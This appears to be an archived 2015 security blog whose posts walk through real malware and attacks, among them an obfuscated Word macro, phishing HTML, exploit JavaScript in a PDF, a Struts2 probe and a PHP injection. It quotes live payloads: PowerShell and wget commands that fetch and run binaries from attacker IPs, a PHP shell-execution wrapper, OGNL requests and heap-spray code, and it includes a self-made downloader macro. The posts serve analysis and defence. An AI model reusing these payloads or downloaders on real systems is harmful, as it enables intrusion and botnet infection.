Tuesday, March 31, 2015

Obfuscated Malicious VBA Macro

I recently blogged about attackers using the auto-close method in Microsoft Word VBA for attacks.

Today I pasted a sample of a malicious Microsoft Word document. If you review the VBA code you'll see that it's a bunch of random variables names, a bunch of calls to chrw, and one call to Shell.

chrw returns the character associated with the numeric character code.

Shell runs the command line code that is passed to it.

How does it work? When it creates a method called 'sdfsdfdsf' that is called when the Microsoft Word document gets closed.

Then it declares 6 variables ( GVhkjbjv + GYUUYIiii + hgFYyhhshu + GYiuudsuds + shdfihiof + doifhsoip )and in each variable it's appending 1 character at a time the malicious shell script it wants to run.

As an example, the first 4 characters in GVhkjbjv are 'c', 'm', 'd', and a space.

ChrW(49.5 + 49.5) & ChrW(54.5 + 54.5) & ChrW(50 + 50) & ChrW(16 + 16)

How did I know that?
ChrW(49.5 + 49.5) = ChrW(99) = 99 on the Ascii Table is the letter 'c'
ChrW(54.5 + 54.5) = ChrW(109) = 109 on the Ascii Table is the letter 'm'
ChrW(50 + 50) = ChrW(100) = 100 on the Ascii Table is the letter 'd'
ChrW(16 + 16) = ChrW(32) = 32 on the Ascii Table is the letter ' '


So if you follow that process through to the end you find
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.203/jsaxo8u/g39b2cx.exe','%TEMP%\4543543.cab'); expand %TEMP%\4543543.cab %TEMP%\4543543.exe; start %TEMP%\4543543.exe;

If you're lazy (like me) and don't want to figure that out 1 character at a time, there are probably tools to fix that. Or just open a new word document, copy this code in, but replace the malicious Shell line

IUGuyguisdf = Shell(JHGUgisdc, 0)

with a message box

MsgBox(JHGUgisdc)



Happy hunting.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Phishing Email Example Walkthrough

I recently posted a phishing email example. I thought it'd be interesting to quickly walk-through what it's doing.

The Subject 'FW: Remittance reconfirmations' tries to draw your attention by looking like a previously forwarded email, and containing talk about payments/remittance.

The Body is actually playing on your friendly side saying 'Kindly Verify the attached remittance and purpose.'

The attachment seems pretty benign in nature as it's named 'Remitance004.html'. But don't be fooled, even '.html' files (as I've blogged about before) can be dangerous.

Top Urgent!
From: 新加坡分行公務信箱(megasing-loan)
Sent: Monday, March 30, 2015 4:42 AM
To: scbonline@sc.com
Subject: hello

From: 新加坡分行公務信箱(megasing-loan)
Sent: Monday, March 30, 2015 4:42 AM
To: scbonline@sc.com

Subject: hello
From: 新加坡分行公務信箱(megasing-loan)
Sent: Monday, March 30, 2015 4:42 AM
To: scbonline@sc.com
Subject: hello


As seen above, the body of the email makes it look like this was forwarded over and over to multiple people, giving it some legitimacy.

But once we look into the attachment ('Remitance004.html') we are able to confirm that it's really just a malicious phish attempt.

<META http-equiv="refresh" content="9;url=http://94.242.224.181/www.notornsecurity.com/Remitance004-pdf.jar"> >

The above code should tip you off as bad, because this line of code says that if you open the html file in a browser, it will not display the contents, but instead automatically redirect you to this '.jar' file which will prompt for downloading. '.jar' files are dangerous. Think of them as executable zip files. They'll probably kick off a storm of activity on your pc that will ultimately end up compromising your system. Don't open '.jar' files unless you know what you're doing.

<span class="btn"> <!-- on click file will be downloaded--> <a href="http://94.242.224.181/www.notornsecurity.com/Remitance004-pdf.jar" class="small radius button btn_red"><b>Download</b></a> </span> >

Otherwise, if you open it just in your email client, you will be shown a pretty looking page, and the code above shows that part of that page will contain a button that if you click on it, it'll load the same malicious jar file.

Don't open emails from people you don't know, especially if it's got an attachment.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Friday, March 27, 2015

Search for files by MD5 Hash

If you're not familiar with an MD5 hash, how to find one, or it's uses I suggest you first read this prior blog.

Let's say you want to check if there is a particular malicious file on your computer. You know the MD5 Hash, but you have no idea where it might be located or what the name of the file might be. The attacker has done a good job obfuscating it. The good news is there is the perfect tool for this. It's the free md5deep tool. It support recursive traversal, which you can then combine with a quick Powershell trick to find only the specific MD5 hash you're looking for.

> .\md5deep.exe -r c:\ | Select-String "77b5b1c8b3f7b8a183f55737d9a392234"


Just replace your hash with my hash and you're good to go! As a sample below, i searched for this MD5 hash just against my temp folder and in a matter of seconds it found it! There are 2 parts to this command. The first half is just the md5deep tool recursively searching the c:\ drive as it should. But default behavior is for it to spit out the MD5 hash of EVERY file. So use the powershell Select-String command to only display the file you wanted. If it returns nothing, then it didn't find it.



Happy hunting!

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Find the MD5 Hash of a File

One common way that virus scanners and security experts can track down malware is by hashing it. This gives you a unique value for that particular executable or malicious file. How do they get that hash? One example is using the free md5deep tool. Run from the command line, it can quickly give you the MD5 has of the file. Note: There are other tools to give you similar SHA1 and SHA2 hashes.

> .\md5deep.exe c:\windows\temp\AdbeRdr110009_en_US.exe




Another use that general internet users can have for these MD5 hashes is to provide confirmation that the file they just downloaded is truly the file the author intended you to download. In between you clicking and downloading, many malicious things can happen to a file to the point where you're no longer downloading what you thought you were. Therefore if the author publishes an MD5 hash of his file on his website, then you can download the file, run md5deep like above, and confirm that the MD5 hash you got matches the one on the author's website. It's a good best practice to stay safe out on the dirty internet.

Trust but verify!

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

How to Add Javascript to a PDF

I recently blogged about analyzing javascript in a PDF. I'd like to go full circle now and go back to an example of how to put javascript into a PDF, then detect that code I just put in there.

It starts with an amazing tool from Didier Stevens again called make-pdf-javascript.py

Now let's write some Adobe API javascript code (my full sample here) that displays a popup and then sends the user to my blog. Save it to a file called 'code.js'

app.alert('neonprimetime created this sample for educational purposes');
app.launchURL("http://neonprimetime.blogspot.com", true);


Then we need to run the make-pdf-javascript.py tool that we downloaded earlier and watch as it creates a new pdf.

> .\make-pdf-javascript.py -f .\code.js sample.pdf



Now you have 2 ways a user could open this malicious PDF. They could open it in Acrobat Reader or in their Browser (Internet Explorer, Firefox, Chrome, etc.). The behavior of this one is different depending on your choice.

If I open in the regular Adobe Reader application it looks like this (Note: Adobe has a nice security feature that prompts you to confirm if you really want to open the webpage)





Now if you open it in a browser it behaves slightly different, a bit more deceiving actually in my opinion. The PDF is actually replaced by my webpage! Interesting to say the least.





Now I could've actually caught this ahead of time by running the process I explained in a previous blog

> .\pdfid.py .\sample.pdf

You'll notice below that it found 1 instance of Javascript



> .\pdf-parser.py .\sample.pdf

You'll notice below that it shows my javascript



Don't trust those random emails from random nobodies!

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

My Attempt at Walking Thru some Malicious Javascript in PDF

After analyzing a PDF and finding malicious javascript inside it (previous blog), I wanted to make a rough attempt at steping through and trying to determine what the javascript is doing. Keep in mind that attackers try to hide and confuse us with their Javascript via lots of obfuscation methods. I have pasted the raw obfuscated code here.

So this is just an attempt, I cannot claim to know exactly what's happening here. The first thing I'd do is separate the functions from the code that will execute immediately. Anything inside a 'function () { }' is not getting executed yet, it will only be executed after it's called. So I care more about the code that is getting executed immediately upon load.

sIIESTRI = {};
sIIESTRI['11.001'] = {};
sIIESTRI['11.001']['dIAVOLO'] = '11.001';
sIIESTRI['11.001']['sCHIUMA'] = (0x7a);
sIIESTRI['11.001']['pENITENZA'] = (0x7af4);
sIIESTRI['11.001']['cOTESTA'] = (0x79f000);
sIIESTRI['11.001']['pRENDENDO'] = '11.0.1.36';
sIIESTRI['11.001']['gUADAGNAR'] = 'assist';
sIIESTRI['11.001']['createObjCount'] = 0x93;
sIIESTRI['11'] = {};
sIIESTRI['11']['dIAVOLO'] = '11';
sIIESTRI['11']['sCHIUMA'] = (0x79);
sIIESTRI['11']['pENITENZA'] = (0x7994);
sIIESTRI['11']['cOTESTA'] = (0x79f000);
sIIESTRI['11']['pRENDENDO'] = '11.0.0.379';
sIIESTRI['11']['gUADAGNAR'] = 'assist';
sIIESTRI['11']['createObjCount'] = 0x93;
sIIESTRI['10.105'] = {};
sIIESTRI['10.105']['dIAVOLO'] = '10.105';
sIIESTRI['10.105']['sCHIUMA'] = (0x2a);
sIIESTRI['10.105']['pENITENZA'] = (0x2acc);


The example of above shows the attacker creating a 2-dimensional array of information about the various versions of Adobe Reader. You could think of sIIESTRI as being renamed to AdobeVersionInformationalArray. If it's version 11.0.01, then certain information is needed and actions are taken, and if it's version 10.1.05 then different information is needed and different actions may be taken.

app = true ? app : app;
pRESSURA = eval('unescape');
dISCESA = '%u';


Next there are multiple lines mainly meant to obfuscate the code and make it more confusing to read and harder for automated analyzers to catch bad things. The first line basically does nothing. It always assigns app = app. 'app' by the way is how you access the Adobe Acrobat Api from within a javascript document. The second line basically creates an alias to the unescape function called pRESSURA. Everywhere you see this alias just imagine that the 'unescape' method is really being called instead. The third line is creating an alias for the '%u' which is used to escape UniCode characters. Thus you can expect that somewhere in the code the attacker is going to unescape unicode characters based on those 2 lines.

resto_shamans_rule = true;
var objNumber = 0x0;
var cONTRARIA = [];
var pENSAVA = (0x11871710);
var vINCISLAO = 0x0;
var gIRARSI = 0x0;
var pOSSEDER = [];
var sORRIDENDO = [];
var lARGISCON = [];
var mONCHERIN = [];
var pRODEUNT = [];
var dIMESSA = [];
var cOMPAGNIA = [];
var aRTIGLI = 0x0;
var pASSARSI;
var finalBuf;
var AdobeVersionStr = undefined;
var tERRENZIO = false;


A bunch of disgustingly named variables declared, some of which will be used later. 0x0 is the equivalent of assigning a variable the value 0. Values like (0x11871710) are hex formatted integers, so you can use a site like hex converter to figure out it's the value 294065936. []; indicates that it's declaring an array. Some variables are not given initial values and thus are undefined.

var gRIDARO = unescape("%ubbbb");
while (gRIDARO.length < (0x10000)) gRIDARO += gRIDARO;
var qUETARSI = gRIDARO.substring(0, (0x600));


The above code creates an alias gRIDARO for this chinese looking unicode character. It then sets the alias to not 1 instance of that that unicode character, but instead loops and sets it to a string that has 65,536 copies of that unicode character. Then it creates a second alias qUETARSI that is a string with only 1,536 copies of that unicode character in it.

var cAPPUCCIO = [];
for (var oFFICIO = 0x0; oFFICIO < 5000; oFFICIO++) cAPPUCCIO.push(oFFICIO.toString());


This code creates an array called cAPPUCCIO filled with the integers 0 to 4,999 or basically the index and value are equivalent.

if (app['viewerVersion'].toString().indexOf('11') == 0x0) app.execMenuItem('Find');


This code says that if we're in any version Adobe Reader 11 then run the 'Find' menu item upon load.



MainAction();

Finally we are completed with the initialization and most of the obfuscation, and the attacker begins his attack by calling the MainAction function.

function MainAction() {

if (app['viewerType'] != 'Reader') {

ErrorAlert(0x14);

}
...


If somebody tries to view the PDF in something besides Adobe's Reader, then the attack will not occur. Instead it calls an error function explained below. This is because the attack is targeted at Adobe and won't work in an open source pdf viewer for example. Also it may help the attacker avoid detection because if a user opens this in an open source browser they'll get the error message the attackers wants them to see instead of something about a javascript error related to Adobe which may tip them off.

function ErrorAlert(errorcode) {

app.alert('nt.msii \soeo capmaTnereanu Pe nagcreAleayeotlyde\icdlth eao nidoRo oe oeocateb urcrmlsprnh. alogel ssnaor dd' + errorcode.toString() + ".");

createDefaultFont();

oFFICIO = 0x1 / 0;

oFFICIO = undef / 0;

while (true);

}


When the attacker wants to display an error message, they use Adobe's api to print a popup window to the user. After that there are 4 attempts it appears to make Adobe crash or hang, including calling a non-existant method, dividing by zero, or starting an infinite loop. So let's go back to the MainFunction.


...
if (sIIESTRI[app['viewerVersion'].toString()] != undefined) {

AdobeVersionStr = sIIESTRI[app['viewerVersion'].toString()];

}

if (AdobeVersionStr == undefined) {

ErrorAlert(0x15);

}

if (AdobeVersionStr['dIAVOLO'] == '9.502' && (app.language == 'ARA' || app.language == 'GRE' || app.language == 'HEB')) {

AdobeVersionStr = sIIESTRI['9.502SPEC'];

}

if (AdobeVersionStr['dIAVOLO'] == '10.104' && (app.language == 'ARA' || app.language == 'GRE' || app.language == 'HEB')) {

AdobeVersionStr = sIIESTRI['10.104SPEC'];

}
...


Now in the MainFunction it saves the Adobe Reader version that the PDF is being opened in to the AdobeVersionStr variable. Also if it's an Arabic, Greek, or Hebrew user then it uses special settings (from that original Adobe Version information array created above). So they're singling out those types of users to do something special.

...
aRTIGLI = (0xc930);

var aSSUNTA = unescape('%ueeee%ueeee%ueeee%ueeee%ueeee%ueeee%ueeee%ueeee%ueeee%ueeee');

var pROFONDI = unescape('%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141');

while (aSSUNTA.length < (0x200)) aSSUNTA += pROFONDI;

aSSUNTA = aSSUNTA.substring(0, (0x200));

var sENTENZA = unescape('%u0ff0%u7ffe%u0ff0%u7ffe%u0ff0%u7ffe%u0ff0%u7ffe');

aSSUNTA = "";

while (aSSUNTA.length < (0x10000)) aSSUNTA += sENTENZA;

aSSUNTA = aSSUNTA.substring(0, (0x10000));

for (var cROLLANDO = 0x0; cROLLANDO < 40; cROLLANDO++)

{

for (var oFFICIO = 0xa; oFFICIO < 100; oFFICIO++) {

pOSSEDER.push(aSSUNTA.substring(0, (aRTIGLI / 2) - 3) + oFFICIO.toString());

}

}

gOCCIAR = 'dataValue';
...




Then in the MainFunction there is another obfuscation party as they build some variables and a massive array of funky unicode characters like these 3 0ff0, 4141, and eeee.

for (var oRREVOLI = 0x0; oRREVOLI < (0x1000); oRREVOLI++) sORRIDENDO.push(xfa.datasets.createNode('dataValue', "eNGLISH" + oRREVOLI.toString()));


Then the attacker adds 4,096 empty nodes to a dataset in the PDF.

for (var aLLODETTA = 0x225; aLLODETTA >= 1; aLLODETTA--) {

iTERATE = xfa.resolveNode('xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field' + aLLODETTA.toString() + '[0].#ui[0]');

dIMESSA.push(iTERATE);

eCCELSE = xfa.resolveNode('xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field' + aLLODETTA.toString() + '[0].#ui[0].#choiceList[0]');

cOMPAGNIA.push(eCCELSE);

}


Then the attacker loads a bunch of drop down lists from user interface objects from the 1st page and form in the PDF and saves references to them in some arrays, to use later.

xfa.resolveNode('xfa[0].form[0].form1[0].#subform[0].rect1').keep.previous = 'contentArea';

Things are starting to get blurry from me, but I'll press on. Now it seems to set a rectangle in the PDF form to have it's keep.previous value to 'contentArea'. From what I've read, this is related to the bug the attacker is trying to exploit. Once the drop down list is re-attached to the form, the bug will trigger.

pASSARSI = app.setTimeOut("NextMainAc();", 500);


Now the attacker is going to call the another function called NextMainAc after a 1/2 second pause.


for (var iMMOBILI = 0x0; iMMOBILI < (0x3f); iMMOBILI++) {

var eNGLISH = xfa.resolveNode('xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field' + objNumber.toString() + '[0].#ui');

if (eNGLISH == undefined || eNGLISH == null) {

}

try {

eNGLISH.oneOfChild = cOMPAGNIA.pop();

} catch (e) {


To skip along a bit in the code, you should spot where it's pulling the drop down lists back out of the array cOMPAGNIA where they were saved earlier. From what I have read again, it sounds like the line of code saying eNGLISH.oneOfChild basically triggers the Adobe vulnerability by re-attaching the list. This causes Adobe to de-reference an unitialized pointer which with proper tinkering of the heap can cause the execution of the attackers malicious code.

function oTHERWISE(pRENDENDO, t) {

if (pRENDENDO == '10.0.1.434') {

var r = "";

r += ue(t + 0x39);

r += ue(t + 0x39);
r += ue(t + 0x39);
...
r += ue(t + 0x412b0b);

r += ue(t + 0x519ee3);
r += ue(t + 0x793001);
r += ue(t + 0x57dc29);
r += ue(0x54746547);
r += ue(t + 0x464e3a);
r += ue(t + 0x519ee3);
r += ue(t + 0x793005);
r += ue(t + 0x57dc29);
r += ue(0x50706d65);
r += ue(t + 0x464e3a);
r += ue(t + 0x519ee3);
r += ue(t + 0x793009);
r += ue(t + 0x57dc29);


Then again trying my best to parse thru, I see code like this and think that it's probably the payload (the executables, etc.) that are going to be delivered to the victim's machine in an Adobe temp folder somewhere.


function pECCATORE(pRELIBA) {

var cACCIANLI = 'contentArea';
...
lARGISCON.push(xfa.template.createNode(cACCIANLI, "t"));


And I'm no expert, so just guessing that one of the lines of code like this is pushing the payload into the PDF so that it can begin to execute when that pointer dereferencing bug is triggered.

Summary: Well, I tried :-) I hope you found it interesting. It appears that this javascript is attempting to take advantage of a specific vulnerability in Adobe by setting certain parameters and values in the Adobe API. It uses lots of obfuscation techniques to make the code and payload virtually unreadable.

Be careful what you open!

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Analyzing Malicious PDF with Javascript in It

Let's say you have a PDF that you suspect is suspicious. Here's one way to analyze it. First download Python 2.7, then download these 2 tools (pdfid and pfd-parser) from Didier Stevens.

Then run pdfid against the pdf to get counts of what types of objects are in the pdf.


python.exe pdfid.py badpdf.pdf


Notice you see that the counts indicate "1" Javascript section in the PDF. Could be suspicious?

Then run pdf-parser to extract the raw contents of the pdf (including the javascript).

python.exe pdf-parser.py -f -w badpdf.pdf > output.txt

Open the output.txt in Notepad++


Scroll down and find the javascript!


Time for analysis!!!

Thank you to this great post by Zelster Security group for getting me started on this and these great tools by Didier Stevens.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Thursday, March 26, 2015

McAfee Artemis Alerts and the MD5 Hash

I thought it was interesting to learn from this McAfee KB about Artemis the following

Artemis!1234567890AB

The bold text above equals the first 12 hexadecimal characters of an MD5 hash of the file it found.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Apache Struts2 Remote Code Execution Walkthrough

I recently posted notes on an Apache Struts2 Remote Code Execution attempt

Here's the guts of the attack.
GET /How.do?redirect:${#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#res.setCharacterEncoding("UTF-8"),#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#res.getWriter().print("dir:"),#res.getWriter().println(#req.getSession().getServletContext().getRealPath("/")),#res.getWriter().flush(),#res.getWriter().close()} But what is it doing? Let's walk through it in a bit more detail.

Apache Struts is a free, open-source, MVC framework for creating elegant, modern Java web applications.

Back in 2013 Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.

In this example we see the vulnerable 'redirect' method being used.

GET /How.do?redirect:

Request to Java Servlet on Apache Tomcat server that is hopefully running an old version that is vulnerable to the redirect method code execution issue

${
#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),


Get this web request's Response so the attacker can tweak the settings on it

#res.setCharacterEncoding("UTF-8"),

Change the response to a character set that is readable like UTF-8

#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),

Get this web request so the attacker can change was it does

#res.getWriter().print("dir:"),
#res.getWriter().println(
#req.getSession().getServletContext().getRealPath("/")
),
#res.getWriter().flush(),
#res.getWriter().close()}


Change this request so that instead of redirecting, it prints the absolute path on disk where the apache tomcat server is hosting the web files

Summary: This attack is not actually doing anything except validating if they've found a vulnerable victim server. Odds are that this is an automated bot scanning the internet for victims, and if the bot gets a response back (like an absolute path on disk where tomcat is running) then the bot will immediately send another more malicious attack that drops a persistent payload on to compromise the server.

Keep your software versions up-to-date.

FYI - This is the snort rule that captures this attempt
SERVER-APACHE Apache Struts2 blacklisted method redirect (1:29748)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"SERVER-APACHE Apache Struts2 blacklisted method redirect"; flow:to_server,established; content:".do?redirect|3A|"; fast_pattern:only; http_uri; metadata:policy balanced-ips drop, policy connectivity-ips drop, policy security-ips drop, service http; reference:cve,2013-2248; reference:cve,2013-2251; reference:url,struts.apache.org/release/2.3.x/docs/s2-016.html; reference:url,struts.apache.org/release/2.3.x/docs/s2-017.html; classtype:web-application-attack; sid:29748; rev:1; )

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Tuesday, March 24, 2015

Angler exploit kit False Positive

So I saw this alert
EXPLOIT-KIT Angler exploit kit outbound URL structure (1:31046)

Which triggered by this snort rule
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"EXPLOIT-KIT Angler exploit kit outbound URL structure"; flow:to_server,established; urilen:>70; content:"= HTTP/"; fast_pattern:only; content:"User-Agent"; http_header; content:"="; http_uri; pcre:"/^\/[-\w]{70,78}==?$/U"; flowbits:set,file.exploit_kit.silverlight&file.exploit_kit.jar; metadata:service http; classtype:trojan-activity; sid:31046; rev:3; )

Which was caused by this request
GET /aHR0cDovL2Nkbi5pbmNsaW1nLmNvbS9hZmZpbGlhdGUvZ2V0LW15LXF1b3Rlcy1iYWRnZS5wbmc= HTTP/1.1
Host: mail03.perfectmatchjobs.com

So I plugged this url into virustotal, web of trust, urlquery, urlvoid, etc. and found no findings
(162.222.37.38) hxxp://mail03.perfectmatchjobs.com/aHR0cDovL2Nkbi5pbmNsaW1nLmNvbS9hZmZpbGlhdGUvZ2V0LW15LXF1b3Rlcy1iYWRnZS5wbmc=

But everytime I see random text with an '=' sign at the end I think of Base64 encoding, so I run that through notepad++ Base64 decoding




And I end up with this url
(54.230.99.38) hxxp://cdn.inclimg.com/affiliate/get-my-quotes-badge.png

Which is exactly what shows up when I view it in url query

Which happens to just be an image or advertisement.

So I think this snort alert was a false positive. This is some kind of paid advertising or something and the developers are just encoding or hiding the url to prevent monitoring tools from seeing or detecting the hidden redirect that is occurring.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Monday, March 23, 2015

It's not safe to Close Word Documents

Threatpost recently told us that the Dridex Malware has been seen using the AutoClose method in VBA.

First: What is the AutoClose function? This is a function in VBA (Visual Basic for Applications) that allows you to write code that will execute when a Microsoft Office document (Word, Excel, Powerpoint, etc.) is closed. A good legit example might be to prompt a user before they close to see if they want to run the spell-checker.

Second: Why is using AutoClose different than previous forms of malicious VBA? Because some malware detection detonation tools probably open malware, may even wait a period of time for code to execute, and might even attempt to trick malware into fast forwarding in time ... but I'm not sure how many also experiment with closing the document. I think most tools so far wait a period of time, and if nothing happens, the sandbox is closed and disposed of (without actually close the document). So if the malware doesn't run till document close, then many tools may miss it.

Third: I thought it'd be fun to see exactly what I'm talking about in action!

Let's forecast into the future quickly by showing you this harmless empty folder at c:\windows\temp\badstuff


Now let's start the magic. Here is my malicious, albeit harmless looking word document.


Let's say you got it in an email and you thought it was legit, so you opened it. You clicked the "Enable Content" (NOTE: This is not a good idea.) cause you were expecting something useful to show up. But instead you got nothing. The document did nothing. Looks pretty useless. (NOTE: Even if you were a malware reverse engineer, if you setup some monitoring or used some automated tool, you'd see that so far, the document has done nothing, no callouts, no file changes, no registry changes, nothing.)

Then if you're the user, you hit that harmless, never can hurt-you, easy to use Red X that closes the document.


You go on your merry way, thinking that was kinda stupid that you recieved that pointless empty word document.

Let's go back and look at that harmless empty folder c:\windows\temp\badstuff


OH SNAP! Where'd that come from?

Good thing I'm a good guy, and I'd never mean you any harm. But what if this word document wasn't from a nice guy. Looks like they somehow gained some very dangerous access to your computer. Can you trust anything on your PC anywhere? Probably not, better re-image and re-build it.

How did that happen? If you re-opened the word document and when to the Developer -> Visual Basic section under 'This Workbook', you'd see some code inside an 'AutoClose' function.


Sub AutoClose()
     Shell ("powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://neonprimetime.blogspot.com/2015/03/talking-thru-some-malware-in-microsoft.html','c:\windows\temp\badstuff\myfakemalware.txt')")
End Sub


Code like above can be modified to do whatever the attacker wants. Something more malicious than what I did. The snippet above simply downloads a file to your c:\ drive from an internet site. Imagine if in addition there was a command added to execute that file. Uh-oh, now we're in trouble.

Please don't open unexpected files from people you weren't expecting to send them. Microsoft Office documents cannot be trusted.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Friday, March 20, 2015

Extract a Macro from an Excel Doc

There are a few tools out there that extract Macros out of Microsoft Office Documents. I thought I'd walk through and example of how.

First let's create an excel document with a macro.

1.) First open Excel, select the Developer Tab, and the Visual Basic option


2.) Double-click in the VBA Project window on 'This workbook'


3.) Select the "Workbook" from the VBA code drop down list


4.) Write a Hello World type macro (Ex: MsgBox("Hello World") )


5.) Close out of the VBA code area


6.) Save the Excel doc as one of those old evil versions of Microsoft Office


Second let's extract the macro from the excel document without opening it

1.) Download one of the free Macro extraction software tools like OfficeMalScanner


2.) Run the extractor from the command line (Ex: OfficeMalScanner.exe C:\windows\temp\sample.xls info)


3.) See that it found something


4.) View the output folder


5.) Open the file 'ThisWorkbook' to see the macro code!




Now you're safe to analyze without opening and getting infected. Sweet.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Thursday, March 19, 2015

PHP Injection Attempt Walkthrough

I posted some details about a PHP Injection attempt here. I'd like to explain in more detail the code below seen in the attack. The goal is of the attacker is that if you're running an old unpatched version of php, if they pass in the url parameters listed in my pastebin link, then the body of the POST (the code below) will get executed on the server. Let's see what the code would try to do.

<?php
echo "Zollard";

The attacker is simply printing out their calling handle to the screen in the code above, probably as confirmation that the server is vulnerable.

$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
{
    $disablefunc = str_replace(" ","",$disablefunc);
    $disablefunc = explode(",",$disablefunc);
}

This code above gets a list of functions that are disabled (for security reasons) on the web server. This is useful for the attacker so they know which commands they can and cannot run on this server. If they run the wrong one, they might get logged or flagged as suspicious, and they wouldn't want that!

function myshellexec($cmd)
{
    global $disablefunc;
    $result = "";
    if (!empty($cmd))
    {
        if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
        elseif (($result = `$cmd`) !== FALSE) {}
        elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
        elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
        elseif (is_resource($fp = popen($cmd,"r")))
        {
            $result = "";
            while(!feof($fp)) {$result .= fread($fp,1024);}
            pclose($fp);
        }
    }
return $result;
}

This code above is a function declaration, so no code is actually getting executed yet. It's creating a function called 'myshellexec' that can be run later. This function takes 1 parameter, the shell command that you want to execute. At a high level, all this function attempts to do is execute the command against the shell prompt and return the results to the caller. Digging deeper, it's actually a bit more complex, because unlike when you're writing a normal legit program, in this case you don't know exactly how the system will allow you to run your shell command. Some methods may be disabled/allowed and some might not, so there is a series of checks (if/elseif) statements to determine what is the best way to execute the command passed in. Everybody is probably most familiar with the exec command, so that is the first check to see if you could write something like "exec('echo hello world')". If you weren't aware there are 2 other functions that essentially do the same thing, "system()" and "passthru()" ... so if one is not available, try the next, and try the next until you get one that works. You'll notice the checks are 2-fold 1.) First is the function is_callable, this is a standard php method that allows you to verify a function name before calling it 2.) Second is a function !in_array which you'll notice uses our $disablefunc variable from above, so basically it's checking to see if the function is not disabled by the web server. If both checks pass, it tries it. If one of those 2 checks fail, it does not try that command and moves on to check the next command. So there is ever only 1 attempt to execute the command, there are NOT many attempts to execute it. If 'exec', 'system', and 'passthru' all fail then it's final attempt at exploiting is to take the current process we're in (probably the Apache web server worker process) and attempt to fork a new child process that runs the command passed in. That is done by 'popen' and then 'fread' to get the results of the child process. If that fails, then the exploit fails.

myshellexec("rm -rf /tmp/armeabi;wget -P /tmp http://114.4.144.121:58455/armeabi;chmod +x /tmp/armeabi");
myshellexec("rm -rf /tmp/arm;wget -P /tmp http://114.4.144.121:58455/arm;chmod +x /tmp/arm");
myshellexec("rm -rf /tmp/ppc;wget -P /tmp http://114.4.144.121:58455/ppc;chmod +x /tmp/ppc");
myshellexec("rm -rf /tmp/mips;wget -P /tmp http://114.4.144.121:58455/mips;chmod +x /tmp/mips");
myshellexec("rm -rf /tmp/mipsel;wget -P /tmp http://114.4.144.121:58455/mipsel;chmod +x /tmp/mipsel");
myshellexec("rm -rf /tmp/x86;wget -P /tmp http://114.4.144.121:58455/x86;chmod +x /tmp/x86");
myshellexec("rm -rf /tmp/nodes;wget -P /tmp http://114.4.144.121:58455/nodes;chmod +x /tmp/nodes");
myshellexec("rm -rf /tmp/sig;wget -P /tmp http://114.4.144.121:58455/sig;chmod +x /tmp/sig");
myshellexec("/tmp/armeabi;/tmp/arm;/tmp/ppc;/tmp/mips;/tmp/mipsel;/tmp/x86;");
?>

Finally in this code above the attacker makes calls to the 'myshellexec' function that we declared earlier. This is where the actual exploit is attempted. Notice each call passes a command the first removes any temp files (rm -f), then downloads a malicious file specific to a system architecture (wget), changes the permissions to executable (+x), and then runs the payload. The attacker here runs several commands, one for each of the command server architectures, thus their payload must be system dependent and for example the x86 payload must not work on a mips server, and visa versa.

So in Summary for this exploit to work we must be talking about a Web Server, that is running Linux , and has an old unpatched version of PHP that is vulnerable to the initial injection attempt URL posts parameters. Then if that's the case, next either the 'exec', 'system', or 'passthru' function must be allowed/enabled and or the ability for the Apache process to fork a child. Then if that's the case, if the server is running one of the architectures listed (armebi, arm, ppc, mips, etc.) then the exploit will likely succeed, the payload delivered, and your server is now probably part of a larger botnet until you re-build it.

Stay patched and configured your servers properly!

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Wednesday, March 18, 2015

SSL/TLS Best Practices from the OpenSSL Cookbook

Ivan Ristić wrote a great free online book about SSL/TLS security called OpenSSL Cookbook.

Appendix A makes for great bullet points "SSL/TLS Deployment Best Practices"

  • Use 2048 bit private keys
  • Restrict Access to the private keys
  • Obtain Cert from a reliable CA
  • Use Strong Cert algorithms (Ex: don't use SHA1)
  • Use Secure Protocols (Ex: don't use SSL v2 or v3)
  • Use Secure Cipher Suites (Ex: don't use RC4)
  • Support Forward Secrecy
  • Disable Client-Initiated Renegotiation
  • Disable TLS compression
  • Pay attention to performance
  • Encrypt 100% of your website (don't mix content)
  • Secure your cookies
  • Validate everything works


